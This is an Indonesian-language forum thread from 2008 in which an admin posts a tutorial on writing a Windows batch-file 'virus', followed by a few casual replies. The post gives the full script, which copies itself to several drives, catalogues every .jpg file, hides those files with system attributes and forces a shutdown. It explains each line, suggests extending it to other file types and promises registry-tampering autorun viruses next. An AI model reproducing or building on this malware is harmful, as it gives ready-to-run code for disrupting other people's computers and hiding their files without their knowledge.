RendezVous

Forum for exclusive community
 
HomeHome  CalendarCalendar  GalleryGallery  FAQFAQ  SearchSearch  MemberlistMemberlist  UsergroupsUsergroups  RegisterRegister  Log in  

Share | 
 

 Yang suka maen2 nih ama Virus^^

View previous topic View next topic Go down 
AuthorMessage
Snoopy
Admin
Admin


Male Number of posts : 119
Age : 26
Location : Indonesia
Job/hobbies : Licking Ice Cream
Registration date : 2008-12-13

PostSubject: Yang suka maen2 nih ama Virus^^   Wed Dec 17, 2008 3:02 pm

Halow teman2..hihihhi

Gw buat topik baru nih menganai cara membuat virus..hihihi.. gw bukannya bermaksud untuk ngajarin loh tapi cuman saling membagi pengalaman sama pengetahuan aja^^

Sebenarnya sih banyak cara yang bisa digunakan untuk membuat suatu virus yang mematikan, hmm..cuman bermodalkan logika yang baik dan sedikit menguasai bahasa pemograman aja udh bisa buat virus loh...hihihih...

tapi disini g mao bahas pembuatan virus dalam bentuk batch file, knapa gw pilih batch file..karena ini yang paling gampang dipelajari, hmm..bisa di katakan paling dasar lah..hihihi..Nanti klo dah jago sih bisa buat Trojan dari Vb..heheheh

Gw mulai aja ya^^

Virus I
kriteria virus yg gw buat ini terdiri dari :
1. Ketika virus di jalanin, virus bakal ngopy dirinya ke smua drive dari A,C,D,E dan F
2. Selanjutnya virus bakal mengecek smua file dengan ekstensi *.jpg yang ada di semua drive
3. File-file berekstensi *.jpg tersebut yang di ketemukan virus akan dirubah atribut nya ke dalam mode supper hidden

Mulai membuat :
Buka notepad nya dulu lewat Run

trus ketik perintah d bawah ini

Echo off > C:\data.txt
for %%p in (A C D E F) do copy %0 %%p:
for %%q in (A C D E F) do dir %%q:\*.jpg /B /S >> C:\data.txt
for %%r in (A B C D E F) do attrib +h +s %%r:\*.jpg /s
shutdown -s -f -t 30
exit

Penjelasan :

algoritma 1 >> for %%p in (A C D E F) do copy %0 %%p:
gw make perulangan jadi lebih efektif, sebenernya sih bisa aja pke copy doang cuman harus nulis 5 baris...heheheh
jadi %%p itu menunjukan variabel di dalem virus....waktu virus ini jalan variabel p nya itu bakal di copy ke smua drive

algoritma 2 >> for %%q in (A C D E F) do dir %%q:\*.jpg /B /S >> C:\data.txt
masih pke for juga buat perulangan....[dir] disini merupakan perintah untuk melakukan pengecekan pada direktori di semua drive yang berformat *.jpg...../B disini untuk ngilangin tampilan header waktu perintah dir di jalanin...../S dipake supaya pencarian file sampai ke subdirektori.....

algoritma 3 >> for %%r in (A B C D E F) do attrib +h +s %%r:\*.jpg /S
sama juga masih pke perulangan untuk melakukan penyembunyian file2 dengan ekstensi *.jpg..klo mao sembunyiin yg lain misal : file ekstensi *.doc , *.pdf , *.bmp dll...tinggal ganti aja tuh ato nggak d tambahin sendiri..heheheh...
nah attrib +h +s untuk membuat file ekstensi *.jpg itu status nya menjadi hidden^^

algoritma 4 >> Shutdown -s -f -t 30
ini perintah untuk melakukan shutdown komputer
-s perintah untuk shutdown
-f perintah untuk menutup secara paksa smua aplikasi yang masih jalan
-t 30 memberikan waktu 30 detik sebelum di shutdown...klo mao isi 1 juga bisa..hehehehhe....

Klo udh program ini di save dalam ekstensi *.bat.....cara ngetes virus nya jalan ato nggak klik aja file yang berekstensi bat tadi...hwhwhwh...Nanti klo dah di coba, gw kasih taw cara ngatasin virus di atas ini^^

Tunggu Virus2 selanjutnya ya....kpn2 kita buat virus yang bisa ngacak2 registry windows yang bisa autorun dari flashdisk..

Klo yang punya pengetahuan ato pengalaman buat virus bagi2 ya... posting aja di sini^^
Back to top Go down
View user profile http://rendezvous.forumakers.com
fann
Kupu-kupu
Kupu-kupu


Female Number of posts : 41
Age : 27
Location : jakarta
Job/hobbies : boboooo
Humor : swt
Registration date : 2008-12-14

PostSubject: Re: Yang suka maen2 nih ama Virus^^   Tue Dec 23, 2008 3:36 pm

wowww....
puyengggg pisan eke...hhehhehehe...
tapi hebat2...hehhehe
Back to top Go down
View user profile
R
Momod
Momod


Male Number of posts : 129
Age : 26
Location : di situ
Job/hobbies : gitu
Humor : ah gak penting lah ini
Registration date : 2008-12-13

PostSubject: Re: Yang suka maen2 nih ama Virus^^   Wed Dec 24, 2008 1:37 am

kayanya gw pernah liat ini di buku apa gitu deh..
Back to top Go down
View user profile
dapitocir
Momod
Momod


Male Number of posts : 282
Age : 26
Location : C:\\\\Tangerang\\\\Ciledug\\\\sumpek
Job/hobbies : gitar, fotografi, baca.
Registration date : 2008-12-13

PostSubject: Re: Yang suka maen2 nih ama Virus^^   Wed Dec 24, 2008 4:17 am

R wrote:
kayanya gw pernah liat ini di buku apa gitu deh..

hahaha... lol!
Back to top Go down
View user profile
V4nd3R
Kupu-kupu
Kupu-kupu


Male Number of posts : 98
Age : 25
Location : jakarta
Job/hobbies : apa aja yang asiikkk
Humor : haha
Registration date : 2008-12-19

PostSubject: Re: Yang suka maen2 nih ama Virus^^   Wed Dec 24, 2008 4:29 am

Hmmmm......Programmer sejati memankk....
bisa membuat virusss...
btw pake apaan itu???java y??
Back to top Go down
View user profile http://www.beritabola.com
Sponsored content




PostSubject: Re: Yang suka maen2 nih ama Virus^^   Today at 12:06 am

Back to top Go down
 
Yang suka maen2 nih ama Virus^^
View previous topic View next topic Back to top 
Page 1 of 1
 Similar topics
-
» Perlengkapan yang dibutuhkan aquarium laut
» Jenis-jenis Ikan Predator yang biasa dipelihara
» Hal-Hal yang Dipersiapkan Dalam Memelihara Aquarium Laut
» Ikan-ikan yang cocok untuk Aquascape
» 10 ikan Predator purba yang masih hidup

Permissions in this forum:You cannot reply to topics in this forum
RendezVous :: ST Inside :: Share Info-
Jump to: